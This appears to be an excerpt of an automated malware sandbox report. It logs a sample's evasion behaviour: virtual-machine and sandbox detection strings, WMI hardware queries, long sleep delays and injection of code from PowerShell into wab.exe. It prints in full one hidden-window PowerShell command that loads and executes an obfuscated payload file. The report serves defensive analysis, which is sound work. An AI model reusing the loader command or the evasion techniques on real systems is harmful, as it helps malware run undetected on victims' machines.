            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: wab.exe, 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: A70000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20540000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 20450000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599325Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598871Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598608Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598473Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598325Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8362Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1430Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2947Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 6868Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -27670116110564310s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7696Thread sleep count: 2947 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599889s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7696Thread sleep count: 6868 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599325s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -599108s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -598985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -598871s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -598734s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -598608s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -598473s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -598325s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -100000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99437s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99328s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99218s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99109s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -99000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98672s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98234s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98125s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -98015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97905s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97785s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97422s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -97093s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96984s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96765s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96656s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96547s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96422s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96312s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96203s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -96093s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -95984s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -95875s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7692Thread sleep time: -95763s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00402647 FindFirstFileA,0_2_00402647
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00405E7E FindFirstFileA,FindClose,0_2_00405E7E
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040543A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599325Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599108Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598871Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598608Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598473Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598325Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 100000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99437Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99218Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99109Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 99000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98890Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98781Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98672Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98562Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98453Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98234Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98125Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98015Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97905Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97785Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96765Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96656Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96547Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96422Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96312Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96203Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 96093Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95984Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 95763Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: wab.exe, 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
            Source: wab.exe, 00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: powershell.exe, 00000001.00000002.2015644677.0000000007281000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2857526156.0000000000B7F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2857526156.0000000000B17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeAPI call chain: ExitProcess graph end nodegraph_0-3240
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeAPI call chain: ExitProcess graph end nodegraph_0-3394
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02C9DAC0 LdrInitializeThunk,LdrInitializeThunk,1_2_02C9DAC0
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_00405EA5 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405EA5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4220000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A7FEB0Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\hnTW5HdWvY.exeCode function: 0_2_100010D3 GetModuleFileNameA,GlobalAlloc,CharPrevA,GlobalFree,GetTempFileNameA,CopyFileA,CreateFileA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,lstrcatA,lstrlenA,GlobalAlloc,FindWindowExA,FindWindowExA,FindWindowExA,lstrcmpiA,DeleteFileA,GlobalAlloc,GlobalLock,GetVersionExA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreatePipe,CreatePipe,CreatePipe,GetStartupInfoA,CreateProcessA,lstrcpyA,GetTickCount,PeekNamedPipe,GetTickCount,ReadFile,lstrlenA,lstrlenA,lstrlenA,lstrcpynA,lstrlenA,GlobalSize,GlobalUnlock,GlobalReAlloc,GlobalLock,lstrcatA,GlobalSize,lstrlenA,lstrcpyA,CharNextA,GetTickCount,TerminateProcess,lstrcpyA,Sleep,WaitForSingleObject,GetExitCodeProcess,PeekNamedPipe,lstrcpyA,lstrcpyA,wsprintfA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,DeleteFileA,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,0_2_100010D3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
